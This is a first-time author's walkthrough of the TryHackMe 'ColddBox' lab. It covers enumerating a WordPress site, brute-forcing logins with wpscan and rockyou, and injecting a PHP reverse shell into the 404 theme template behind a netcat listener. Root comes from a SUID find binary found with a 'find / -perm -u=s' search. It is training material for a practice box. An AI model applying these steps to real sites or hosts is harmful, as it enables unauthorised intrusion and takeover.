C0lddBox Writeup.
The box can be found here : https://tryhackme.com/room/colddboxeasy
First time, so be nice (I’m a noob, remember).
ENUMERATION
Being on a box, I don’t hesitate, I go for a full scan (and an aggressive one at that):
To have something to work with while waiting, a nice and simple nmap :
Port 80 open, you might also have simply pasted the IP address in your browser to check that (that’s what I do most of the time anyway) :
Nice webpage, looks familiar…
Indeed!
That will probably give us something to work with.
What can you do when you get there?
Have a look around 😊 Check the source code, box makers like to hide clues in there… sometimes ^^
I’ll leave you to it, have a look, not much here… But still, one other clue to what we might be able to do later : the theme used by Wordpress (twentyfifteen)
Next, if you don’t already know where to look, having done too many THM boxes, you’ll go next for dirbuster / gobuster to find what’s there to be found 😊
I’ve been personally using gobuster lately, so here’s what I used.
Have a look at the help page if needed, I like adding the -x to check for specific files. Here, php. The -t200 is to bump up the threads, being on a box, I want it faaaaaaast 😊
Here’s the result :
(Ok, I’m confused at the moment, my full nmap scan just ended, and last night I had another open port, so let me have another go. Here’s the result anyway, we’ve got a version for WP, which you would have got faster without the -p- tag here…)
OK. Can’t explain why, maybe something on my end, but I remember the range of the port, so here you go : you should get an SSH port open with the full nmap scan launched at the beginning (-p tag)
That’s for future exploitation, since — SPOILER — I’m not actually using SSH today ^^
Anyway, back to our Gobuster result.
The first thing smart and curious people would do, is have a look at this hidden folder…
I’m not smart, just curious, so I started with what I know, the wp-login.php page. Let me show you 😊
Use your browser to get there :
A classic WordPress login page. If you’re not familiar with it, now’s the time to discover the WPSCAN tool included in Kali!
This tool is really powerful, so I advise having a look at the help ‘wpscan -h’
You can run it simply with “wpscan –url BOXIPADDRESS”. You’ll get several results, indicating whether this is a vulnerable version.
So let’s continue enumation. We’ll check if we can get usernames.
And we can!
There you, you get potential usernames :
I’m not paying attention to the first one, because only hugo, philip and c0ldd are confirmed.
So let’s put them in a list! Choose your text editor, save your file. Mine is named ‘user’
Now, we’ve got all we need to start bruteforcing WP and guess the passwords!
But first…
Let’s have a look at that hidden folder!
If you go at this address (found thanks to gobuster) BOXIPADDRESS/hidden you get …. The users 😊
That was much simpler right? But now you know how to use WPSCAN ^^
FOOTHOLD
Moving on, we’ve now something to work with to try and log into wordpress!
We’ll continue using WPSCAN. For that, we’re using the ‘user’ file with the usernames, and a Password list, the classic ‘rockyou.txt’ available on Kali.
Here’s what the command will look like. It will take a few minutes to give you a result :
Yes, I’m mean, I hid the password. You’ll have to run the tool 😊 This time, I stopped it before it actually displayed the password, and it had found it anyway. So if you get nothing after 5 minutes, try stopping the tool (Ctrl +C) and hope for the best! Otherwise, be patient ^^
Now, you can login on the wp-login.php page!
You get to the WordPress admin page.
There might be several things to do here, I only know one, so that’s where I went without thinking.
You see on the left several links, and there’s a vulnerability on this old WP version : you can modify pages, so in one of them, you can add your code, your reverse shell to connect directly to the server!
Here’s how you can do it : in Appearance — Editor you can (and will) modify this page for example :
The 404 template! We’ll modify that, ask for a non-existing web page on the server so we call the 404 error page, which will in fact launch our reverse shell… easy, right?
First, find a php-reverse-shell. Why php? Because see the screen above, you see the page is actually 404.php. So we’ll know this should work!
There’s reverse shells on the web (look for Pentestmonkey for instance) or in Kali! Here, I’ll use the one in Kali (actually the same you’ll find on the web) :
Now, let’s edit it, so we ask it to connect back to us! You have to change the $ip IP Address to connect to, which will be the one from your THM VM. I’m using the attackbox at the moment, you’ll find yours with ip a.
You can modify the port if you want to, I’ll leave it to 1234.
Save your modified shell, and be ready to copy/paste it in wordpress! To make that easy, I use Sublime Text. Choose whatever you like to display your code and be able to copy/paste it!
Once this is done, get back to wordpress :
Paste it here, to modify your 404 template page. Don’t forget to click Update File below !
Almost there!
Time to set up your listener now, to get your connection. Open a terminal, and have Netcat listen on the port listed in your reverse-shell : here, 1234
Now, get back on the website, and call a page which you know doesn’t exist. The app will launch the classic 404 error page, which you just modified to a reverse shell! This should connect back to your NC listener.
Let’s try that.
I added some caracters in the URL for the October 2020 archives on the left, and here we go, in our terminal :
We’re in!
You’re now connected as www-data (Apache). If you want to dig a bit, feel free! You should be able to pivot and log in as another user (we already know them), but I admit, I went straight for root!
I’d love to find other ways, but here’s what I’ve done. You’ll see there is a user, c0ldd, but we don’t have permission to read his files, including the user.txt.
So let’s have a look at how we can gain more permissions! Pick something, you can use LinEnum.sh for example, I did, but what I used can be found with this command :
Find / -perm -u=s 2>/dev/null
We’ll find files which have the SUID bit, meaning they can be used with the permissions level of the file owner.
Here, FIND looks promising 😊
Easiest way to hack your way in using SUID files, GTFObins!
Check the website for the command to run :
Read what you get for “FIND”
Execute the command (be sure to either be in the right path, where FIND is actually located, or change it and as explained, use it’s original path)
What it looks like :
And… we’re done!
Feel free to now navigate to the usual flag locations, and even decode them for fun!
I didn’t even take the time to connect as c0ldd, I suppose there’s a way, so that means a bit more fun to have with this box!
Hope you like my first writeup ever 😊
Thanks @C0ldd__ for the box!
À plus les hackers,
@l0l0kidd
